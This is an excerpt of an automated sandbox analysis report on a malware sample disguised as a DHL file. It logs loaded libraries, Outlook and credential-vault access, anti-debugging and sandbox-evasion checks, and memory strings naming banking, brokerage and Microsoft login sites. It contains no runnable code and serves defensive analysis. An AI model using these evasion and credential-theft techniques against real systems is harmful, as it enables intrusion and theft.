            Source: C:\Users\user\Desktop\rDHL8350232025-2.exe Section loaded: version.dll
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exe Section loaded: winmm.dll
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exe Section loaded: mpr.dll
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exe Section loaded: wininet.dll
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exe Section loaded: iphlpapi.dll
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exe Section loaded: userenv.dll
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exe Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exe Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exe Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exe Section loaded: wldp.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: iphlpapi.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: wininet.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: ieframe.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: iertutil.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: netapi32.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: version.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: userenv.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: wkscli.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: netutils.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: wldp.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: profapi.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: secur32.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: mlang.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: propsys.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: winsqlite3.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: vaultcli.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: wintypes.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: dpapi.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: cryptbase.dll
            Source: C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exe Section loaded: wininet.dll
            Source: C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exe Section loaded: mswsock.dll
            Source: C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exe Section loaded: dnsapi.dll
            Source: C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exe Section loaded: iphlpapi.dll
            Source: C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exe Section loaded: fwpuclnt.dll
            Source: C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exe Section loaded: rasadhlp.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32
            Source: C:\Windows\SysWOW64\netbtugc.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
            Source: rDHL8350232025-2.exe Static file information: File size 1563136 > 1048576
            Source: rDHL8350232025-2.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: rDHL8350232025-2.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: rDHL8350232025-2.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: rDHL8350232025-2.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: rDHL8350232025-2.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: rDHL8350232025-2.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: rDHL8350232025-2.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: qSVRmrwLYsrJTsNjTGrEW.exe, 00000003.00000000.2074676354.000000000014E000.00000002.00000001.01000000.00000004.sdmp, qSVRmrwLYsrJTsNjTGrEW.exe, 00000006.00000000.2220851276.000000000014E000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: wntdll.pdbUGP source: rDHL8350232025-2.exe, 00000000.00000003.2010892583.00000000039D0000.00000004.00001000.00020000.00000000.sdmp, rDHL8350232025-2.exe, 00000000.00000003.2011959448.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2149235070.000000000379E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2061355887.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2149235070.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2059839826.0000000003200000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.2151251292.0000000000A58000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4462648577.0000000002DB0000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.2149261496.00000000008A2000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4462648577.0000000002F4E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: rDHL8350232025-2.exe, 00000000.00000003.2010892583.00000000039D0000.00000004.00001000.00020000.00000000.sdmp, rDHL8350232025-2.exe, 00000000.00000003.2011959448.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.2149235070.000000000379E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2061355887.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2149235070.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2059839826.0000000003200000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, netbtugc.exe, 00000004.00000003.2151251292.0000000000A58000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4462648577.0000000002DB0000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.2149261496.00000000008A2000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4462648577.0000000002F4E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: netbtugc.pdb source: svchost.exe, 00000002.00000003.2117854997.000000000301A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2149131877.0000000003000000.00000004.00000020.00020000.00000000.sdmp, qSVRmrwLYsrJTsNjTGrEW.exe, 00000003.00000003.2087754311.000000000115B000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: netbtugc.exe, 00000004.00000002.4461436648.000000000068E000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4463074784.00000000033DC000.00000004.10000000.00040000.00000000.sdmp, qSVRmrwLYsrJTsNjTGrEW.exe, 00000006.00000002.4462504039.0000000002DDC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000007.00000002.2441817012.000000003985C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: netbtugc.exe, 00000004.00000002.4461436648.000000000068E000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4463074784.00000000033DC000.00000004.10000000.00040000.00000000.sdmp, qSVRmrwLYsrJTsNjTGrEW.exe, 00000006.00000002.4462504039.0000000002DDC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000007.00000002.2441817012.000000003985C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: netbtugc.pdbGCTL source: svchost.exe, 00000002.00000003.2117854997.000000000301A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2149131877.0000000003000000.00000004.00000020.00020000.00000000.sdmp, qSVRmrwLYsrJTsNjTGrEW.exe, 00000003.00000003.2087754311.000000000115B000.00000004.00000001.00020000.00000000.sdmp
            Source: rDHL8350232025-2.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: rDHL8350232025-2.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: rDHL8350232025-2.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: rDHL8350232025-2.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: rDHL8350232025-2.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exe Code function: 0_2_000342DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exe Code function: 0_2_00050A76 push ecx; ret 0_2_00050A89
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_004048A9 push esp; ret 2_2_004048AA
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0041E2BA push 00000038h; iretd 2_2_0041E2BE
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0041A436 push ebx; iretd 2_2_0041A600
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00418C92 pushad ; retf 2_2_00418C93
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0041A5D9 push ebx; iretd 2_2_0041A600
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_004017E5 push ebp; retf 003Fh 2_2_004017E6
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00403780 push eax; ret 2_2_00403782
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_004147A2 push es; iretd 2_2_004147AA
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0360225F pushad ; ret 2_2_036027F9
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036027FA pushad ; ret 2_2_036027F9
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036309AD push ecx; mov dword ptr [esp], ecx 2_2_036309B6
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0360283D push eax; iretd 2_2_03602858
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0360135F push eax; iretd 2_2_03601369
            Source: C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exe Code function: 3_2_03A94BAA push FFFFFFBAh; ret 3_2_03A94BAC
            Source: C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exe Code function: 3_2_03A8BB0B push ebx; iretd 3_2_03A8BB32
            Source: C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exe Code function: 3_2_03A89B5E push ebx; ret 3_2_03A89B5F
            Source: C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exe Code function: 3_2_03A8A1C4 pushad ; retf 3_2_03A8A1C5
            Source: C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exe Code function: 3_2_03A8B968 push ebx; iretd 3_2_03A8BB32
            Source: C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exe Code function: 3_2_03A8F7EC push 00000038h; iretd 3_2_03A8F7F0
            Source: C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exe Code function: 3_2_03A75DDB push esp; ret 3_2_03A75DDC
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_02DE09AD push ecx; mov dword ptr [esp], ecx 4_2_02DE09B6
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_00462238 pushad ; iretd 4_2_00462239
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_0046AB37 push 00000038h; iretd 4_2_0046AB3B
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_00466CB3 push ebx; iretd 4_2_00466E7D
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_00466E56 push ebx; iretd 4_2_00466E7D
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_00460EAB push ebp; retf 4_2_00460EAC
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_0046101F push es; iretd 4_2_00461027
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_00451126 push esp; ret 4_2_00451127
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_0046D1B0 push es; ret 4_2_0046D1D0
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_0046550F pushad ; retf 4_2_00465510
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exe Code function: 0_2_0004F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exe Code function: 0_2_000C1C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\netbtugc.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\netbtugc.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\netbtugc.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\netbtugc.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\netbtugc.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            barindex
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exeSandbox detection routine: GetForegroundWindow, DecisionNode, Sleepgraph_0-98223
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exeAPI/Special instruction interceptor: Address: 117BB74
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FF8C88ED324
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FF8C88ED7E4
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FF8C88ED944
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FF8C88ED504
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FF8C88ED544
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FF8C88ED1E4
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FF8C88F0154
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FF8C88EDA44
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0367096E rdtsc 2_2_0367096E
            Source: C:\Windows\SysWOW64\netbtugc.exeWindow / User API: threadDelayed 9842Jump to behavior
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exeAPI coverage: 3.5 %
            Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.7 %
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI coverage: 2.6 %
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 5668Thread sleep count: 130 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 5668Thread sleep time: -260000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 5668Thread sleep count: 9842 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 5668Thread sleep time: -19684000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exe TID: 6596Thread sleep time: -85000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exe TID: 6596Thread sleep count: 41 > 30Jump to behavior
            Source: C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exe TID: 6596Thread sleep time: -41000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\netbtugc.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exe | Code function: 0_2_0006C2A2 FindFirstFileExW, 0_2_0006C2A2
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exe | Code function: 0_2_000A68EE FindFirstFileW,FindClose, 0_2_000A68EE
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exe | Code function: 0_2_000A698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime, 0_2_000A698F
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exe | Code function: 0_2_0009D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_0009D076
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exe | Code function: 0_2_0009D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_0009D3A9
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exe | Code function: 0_2_000A9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_000A9642
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exe | Code function: 0_2_000A979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_000A979D
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exe | Code function: 0_2_000A9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose, 0_2_000A9B2B
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exe | Code function: 0_2_0009DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose, 0_2_0009DBBE
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exe | Code function: 0_2_000A5C97 FindFirstFileW,FindNextFileW,FindClose, 0_2_000A5C97
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_0046BAB0 FindFirstFileW,FindNextFileW,FindClose, 4_2_0046BAB0
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exe | Code function: 0_2_000342DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_000342DE
            Source: F56GKLK7U4.4.dr | Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
            Source: F56GKLK7U4.4.dr | Binary or memory string: discord.comVMware20,11696428655f
            Source: F56GKLK7U4.4.dr | Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
            Source: F56GKLK7U4.4.dr | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
            Source: F56GKLK7U4.4.dr | Binary or memory string: global block list test formVMware20,11696428655
            Source: F56GKLK7U4.4.dr | Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
            Source: F56GKLK7U4.4.dr | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
            Source: F56GKLK7U4.4.dr | Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
            Source: F56GKLK7U4.4.dr | Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
            Source: netbtugc.exe, 00000004.00000002.4461436648.000000000068E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllj
            Source: F56GKLK7U4.4.dr | Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
            Source: F56GKLK7U4.4.dr | Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
            Source: F56GKLK7U4.4.dr | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
            Source: F56GKLK7U4.4.dr | Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
            Source: F56GKLK7U4.4.dr | Binary or memory string: outlook.office365.comVMware20,11696428655t
            Source: qSVRmrwLYsrJTsNjTGrEW.exe, 00000006.00000002.4461843964.0000000000DCF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll!
            Source: F56GKLK7U4.4.dr | Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
            Source: firefox.exe, 00000007.00000002.2443598099.000001CB398BC000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: F56GKLK7U4.4.dr | Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
            Source: F56GKLK7U4.4.dr | Binary or memory string: outlook.office.comVMware20,11696428655s
            Source: F56GKLK7U4.4.dr | Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
            Source: F56GKLK7U4.4.dr | Binary or memory string: ms.portal.azure.comVMware20,11696428655
            Source: F56GKLK7U4.4.dr | Binary or memory string: AMC password management pageVMware20,11696428655
            Source: F56GKLK7U4.4.dr | Binary or memory string: tasks.office.comVMware20,11696428655o
            Source: F56GKLK7U4.4.dr | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
            Source: F56GKLK7U4.4.dr | Binary or memory string: turbotax.intuit.comVMware20,11696428655t
            Source: F56GKLK7U4.4.dr | Binary or memory string: interactivebrokers.comVMware20,11696428655
            Source: F56GKLK7U4.4.dr | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
            Source: F56GKLK7U4.4.dr | Binary or memory string: dev.azure.comVMware20,11696428655j
            Source: F56GKLK7U4.4.dr | Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
            Source: F56GKLK7U4.4.dr | Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
            Source: F56GKLK7U4.4.dr | Binary or memory string: bankofamerica.comVMware20,11696428655x
            Source: F56GKLK7U4.4.dr | Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
            Source: F56GKLK7U4.4.dr | Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
            Source: C:\Windows\SysWOW64\svchost.exe | Process information queried: ProcessInformation
            Source: C:\Windows\SysWOW64\svchost.exe | Process queried: DebugPort
            Source: C:\Windows\SysWOW64\netbtugc.exe | Process queried: DebugPort
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0367096E rdtsc 2_2_0367096E
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00417823 LdrLoadDll, 2_2_00417823
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exe | Code function: 0_2_000AEAA2 BlockInput, 0_2_000AEAA2
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exe | Code function: 0_2_00062622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00062622
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exe | Code function: 0_2_000342DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_000342DE
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exe | Code function: 0_2_00054CE8 mov eax, dword ptr fs:[00000030h] 0_2_00054CE8
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exe | Code function: 0_2_0117A7B0 mov eax, dword ptr fs:[00000030h] 0_2_0117A7B0
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exe | Code function: 0_2_0117BDE0 mov eax, dword ptr fs:[00000030h] 0_2_0117BDE0
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exe | Code function: 0_2_0117BE40 mov eax, dword ptr fs:[00000030h] 0_2_0117BE40
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036D437C mov eax, dword ptr fs:[00000030h] 2_2_036D437C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h] 2_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h] 2_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h] 2_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h] 2_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h] 2_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h] 2_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h] 2_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h] 2_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h] 2_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h] 2_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h] 2_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h] 2_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h] 2_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h] 2_2_036B2349
